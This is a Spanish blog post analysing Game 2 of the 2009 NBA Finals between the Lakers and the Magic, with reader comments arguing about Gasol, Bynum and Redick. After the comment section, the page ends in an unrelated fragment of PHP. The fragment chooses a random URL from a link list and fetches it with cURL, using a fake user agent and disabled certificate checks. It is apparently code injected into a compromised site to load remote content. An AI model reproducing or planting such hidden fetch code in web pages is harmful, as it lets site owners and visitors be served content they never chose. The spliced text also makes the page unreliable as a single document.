Finales 2009 (Game 2): Turnover

08 de June de 2009 por TheDeerHunter

La ansiedad de estas finales, en un formato tan pausado, es un factor que hasta a nosotros, simples aficionados de a pie, nos ataca el corazón. Uno ni se imagina las vueltas que le habrán llegado a dar al partido 1 los Van Gundy, Howard, Lewis, Alston, Turkoglu, Pietrus… y diría que esto es lo más grande de esta competición. No es el brazo de Howard, que otros habrá más fuertes, o la suspensión de Kobe, que otras habrá más ágiles… Es la forma de afrontar una persona una oportunidad de esta magnitud única en su vida e ir afrontando de una forma u otra las inmensas dificultades que van surgiendo.

Tras la humillación del primer día no sería difícil que los Magic llegaran entregados. Lewis fue el gran agraviado, con un partido desastroso. No se le atribuye el carácter férreo como su principal virtud, pero que majestuoso fue ayer asistir a su enésimo renacimiento con ese tiro en suspensión tan puro y tan letal.

En realidad tiempo tuvo para espabilarse. Habría que pararse a analizar qué probabilidades hay de que los Lakers jueguen mal tras un buen partido realizado, igual que se ha estudiado que suelen redimirse tras derrota. El partido empezó feo a dolor, con un 15-15 en el primer cuarto que hacía arrepentirnos de habernos despertado puntualmente. Todo imprecisiones, pérdidas e interrupciones. Muchas faltas sancionadas en un partido de guante blanco. Los árbitros marcaban el territorio contra unos jugadores muy dispersos. Apenas dos minutos de juego y ya teníamos el Gasol vs Howard, y a Kobe doliéndose de una torcedura, sin poder explotar los problemas de Lee y Pietrus. Augurio de velada difícil para los amarillos.

En el segundo Odom lideró a los suplentes en el tercer partidazo seguido que se marca. Ahí empezó su vibrante duelo contra Lewis, pero mal lo pasará Orlando si Gasol&Odom equilibran de tal manera sus respectivos pares. Eso con Bynum completamente fuera de juego, por méritos propios que nada tienen que ver con una lesión de ningún tipo. Simplemente no sabe cuándo se puede meter la mano. La mete siempre y le pitan siempre… Falta le hace reflexionar en el banco. Con un 30% de acierto de Orlando y un gran número de pérdidas nos íbamos al descanso con un +5 local, pero un run-run un tanto enrarecido se notaba en el ambiente.

Se esperaba festival de la mamba negra en el tercero. A ver si se iba a estropear su estupendo promedio, decían algunos. No lo llegó a haber, pero es lo que tienen los genios. Jugando mal producen más que otros en su mejor día. Su actuación seguro será de división de opiniones. También lo fue de errores y aciertos, como los humanos.

También los tuvo Stan Van Gundy. Tal caraja lleva en la posición de base que ha terminado por prescindir de ella. La mejor solución una vez metida la pata hasta la ingle. Navajazo histórico el que le ha pegado a Alston, que tendría que ser un titán para recuperarse de los mazazos. Actualmente tira y lo normal es que no toque aro, lo que provoca que los Lakers hagan sangre flotándole hasta el rubor. Lástima, porque no se lo merecen ni él ni sus compañeros, con lo importante que ha sido para llegar aquí. Sin embargo sí vimos a Turkoglu de base haciendo diabluras, a Lewis de 3 desequilibrando y un juego interior Gortat-Howard que sorprendió por momentos a los Lakers. La última jugada en tiempo reglamentario para Lee estuvo a punto de redimir a Stan de todo y alzarle para los altares. No iba a ser, pero en el tercer cuarto les dieron una buena a los L.A. Si aprende algo para los siguientes partidos eso es lo que se lleva.

Sufriendo, sufriendo y con Odom aguantando al tipo entre graves problemas de faltas, se llegó a la prórroga. Mención a parte tuvo la última jugada para Kobe con Ariza completamente solo. No iba a verlo y se llevó un gorro como un piano. Mal para Lakers si vuelven a ser el equipo previsible del principio de postemporada. Bien por el hecho de que se les ve que han aprendido a sufrir. La defensa de Gasol a Howard debería de ser un manual para cualquier pívot, pero aún faltaba lo realmente bueno.

Fue en el último cuando Gasol destapó el tarro de las esencias. Inmenso en defensa y decisivo en ataque. Superó a Howard incluso en lo físico. Aunque haríamos mal en despreciar el trabajo de Odom y Kobe para que así fuera. Con puntas de experiencia en la defensa, concentrados en el gran trabajo de Fisher y Ariza, y puntas de experiencia en ataque con Kobe sacando faltas y pases para el 16, el partido se decantó inesperadamente para Lakers. Orlando, como otros antes, volvió a fallar cuando lo tuvo… resumido en 20 turnovers que nos vuelven a retrotraer al problema de Alston. Otro mazazo más del que tendrán que levantarse… ahora en Orlando.

PREMIOS TJNBA

MVP: En defensa estuvo inmenso todo el partido, y su actuación será estudiada detenidamente por muchos otros en el futuro inmediato. En ataque se soltó al final, en el momento adecuado para llevarse el gato al agua. Un paso más en su particular camino. 2 victorias más para el ansiado anillo de Gasol. Quién nos iba a decir esto hace bien poco.

La Sorpresa: Es sorprendente ver el rendimiento de Odom en estos 3 partidos seguidos, aunque ya sabemos de lo que es capaz cuando le da el viento por el lado bueno… pero lo realmente sorprendente, tal y como le veíamos es ver al “Rey Pescador” Fisher resultar decisivo otra vez más. Seguramente hay decenas de bases mejores que él en el mundo, pero tienen que nacer 14 veces para dar a los Lakers todo lo que él les ha dado.

La decepción: Hemos tenido que ver la carica de Alston y Anthony Johnson en el banco para entender cuál es el concepto de decepción en la vida.

El mayor esfuerzo en vano: Espectacular la actuación de Lewis… por momentos era el único que remó para Orlando. Luego se le unió Turkoglu. En general repartiremos el premio con ambos, como buenos amigos que deben de ser.

Comenta

11 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Qué partido más feo, por dios!! Y qué susto más grande con el alleyoop a Lee…

    En fin, 2-0. Jugando mal, con muchos desajustes defensivos y con todo lo que quieras, pero 2-0. Yo he dormido más tranquilo hoy (ah, no, calla, que no he dormido!!)

      Citar

  2. couxe dice:
    #2

    Para variar me quedé frito en el último cuarto, y como no, ley de Murphy, a partir de ahí al parecer llegó lo bonito….
    En fin, de lo que yo pude ver, me quedo con el partidazo de Lewis, la buena actitud de Odom, y la inteligencia de Gasol defendiendo a Howard, obligándolo a hacer cosas que no le gustan y/o no sabe hacer bien con las consiguientes pérdidas de balón, en una tremenda demostración de cómo defender bien sin dar hostias, que a veces parece que si no agredes al contrario es que eres un blando y no tienes sangre…
    El resto de lo que vi fue más bien sosete…

    Por cierto, me había coincidido verle pocos partidos hasta ahora, sobre todo importantes, y me llamó mucho la atención negativamente la torpeza tremenda de Bynum defendiendo…

    Ahora la eliminatoria viaja a Orlando donde se jugarán los siguientes 3 partidos, y donde creo que los Lakers se llevarán al menos uno, dejando la eliminatoria poco menos que sentenciada…

      Citar

  3. univerzee dice:
    #3

    Muy bueno TheDeerhunter. El premio a Lewis se lo daria compartido a Turkoglu, por hacer de todo y para nada, incluido el último gorro a kobe. Y en la decepcción, qué tal bynum? No es por nada pero se supera día a día haciendo faltas rapidas y tontas… que poco se estima jugar… dejale que meta canasta!!!

      Citar

  4. luis dice:
    #4

    Buenas noches:
    Varios seguidores de su web nos han solicitado que le incluyamos en el directorio de http://www.Bloggerball.com, motivo por el cual le hemos incluido en la sección de baloncesto.

    Le invitamos a que conozca nuestro proyecto.

    Si no desea estar incluido en nuestro directorio de blogs deportivos por favor indiquenoslo en cartasaldirector@bloggerball.com, muchas gracias y felicidades por tener seguidores tan fieles de su blog.

      Citar

  5. Viva_Dirk dice:
    #5

    Muchas gracias a esos seguidores, así da gusto que Deer se pegue esas panzadas :p

    Respecto al partido, no estuve excesivamente nervioso hasta la última jugada cuando Kobe no le da el balón a Ariza que esta completamente solo, ahí si estaba gritando como un loco.

    La defensa a Howard me esta pareciendo ejemplar, con Pau como primer pilar y Fisher&Odom haciendo muy buenas ayudas. Van Gundy esta intentando cambiar cosas, me gusta que al menos lo intente y no deje pasar las cosas como hacen otros muchos entrenadores.

    En cuanto a Bynum, estoy con univerzee, le falta saber cuando tiene que hacer una cosa y cuando otra, salvo que sean ordenes de equipo que no deje a nadie, jojo.

      Citar

  6. Noname dice:
    #6

    Los que tendrian que contrataros son los del as o los del marca, porque manda narices que gente que hace el blog por su aficion a la nba les den mil vueltas a “periodistas profesionales”

    Enhorabuena por el blog, el mejor sin dudas para seguir la nba (junto al del gran Daimiel jeje)

      Citar

  7. ÑBA dice:
    #7

    No cabe duda que el duelo decisivo de la final está siendo Gasol vs. Howard.

      Citar

  8. kantonyo dice:
    #8

    Partido igualado, a diferencia del primero. Parece que los Magic quieren vender cara la final. No entiendo como Van Gundy da tanto protagonismo en los minutos decesivos a JJ Redick. En la OT desperdició dos jugadas decisivas, perdiendo un balón por precipitación y fallando un triple (su especialidad) estanto totalmente solo. Es un jugador que gracia a su nivel en la NCAA ha tenido demasiadas oportunidades, debería probar suerte en Europa.

      Citar

  9. Viva_Dirk dice:
    #9

    Discrepo de lleno con Kantonyo, para mi Redick ha tenido poquísimas oportunidades, sus minutos en todas las temporadas que lleva lo demuestran. Y antes de la OT se te olvida que clava el triple que empata el partido a pocos segundos para el final.

    Redick deberia haber tenido alguna temporada de mas de 20 minutos por encuentro y habriamos visto su rendimiento. Veremos que contrato le ofrecen cuando se le acabe el de rookie.

      Citar

  10. kantonyo dice:
    #10

    Te parece asumible entonces, en una final, contra el equipo favorito, en su casa, después de todo el esfuerzo del encuentro, llegando a la prorroga con 91-90 a favor con sólo 2:40 para terminar, que se quede totalmente solo para un triple, un especialista, que es lo único que se le puede pedir a este jugador, y que falle. Y no contento con eso, coja la pelota, y precipitandose entregue la pelota a Fisher para que gracias a esos errores ponga el 91-94 quedando 1:30 para el final.

    Yo creo francamente que ahí estuvo la clave del partido, por esas dos jugadas, los Magics jugaron a remolque los dos últimos minutos cuando tenían que haber sido los californianos.

    Y con sus estadísticas hasta el momento, en su carrera NBA, aunque hubiera jugado una media de 40 minutos, no hubiera destacado en nada. Para ser un anotador, tiene unos porcentajes pesimos, no asiste, no rebotea, no defiende ….

    Yo esperaba más de este jugador, algo parecido a la Bomba, pero se ha quedado en un bluf.

      Citar

  11. Viva_Dirk dice:
    #11

    Claro que me parece asumible que un jugador falle un triple y pierda un balón, no me parece asumible que lo haga alguien en quien se confia todo el año, se siente importante y puede demostrar lo que vale; pero un tio al que no le das naaaaaaaada de bola en todo el año luego no puedes tratarle como si fuese Kobe.

    No se ha quedado en nada porque no ha jugado nada, no se pueden extrapolar estadísticas ya que no es lo mismo salir a tener que demostrar que eres la leche en 15 minutos sin poder cometer fallos, que tener confianza para poder hacer tu juego.

    Le ha pasado exactamente lo mismo que a Sergio.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>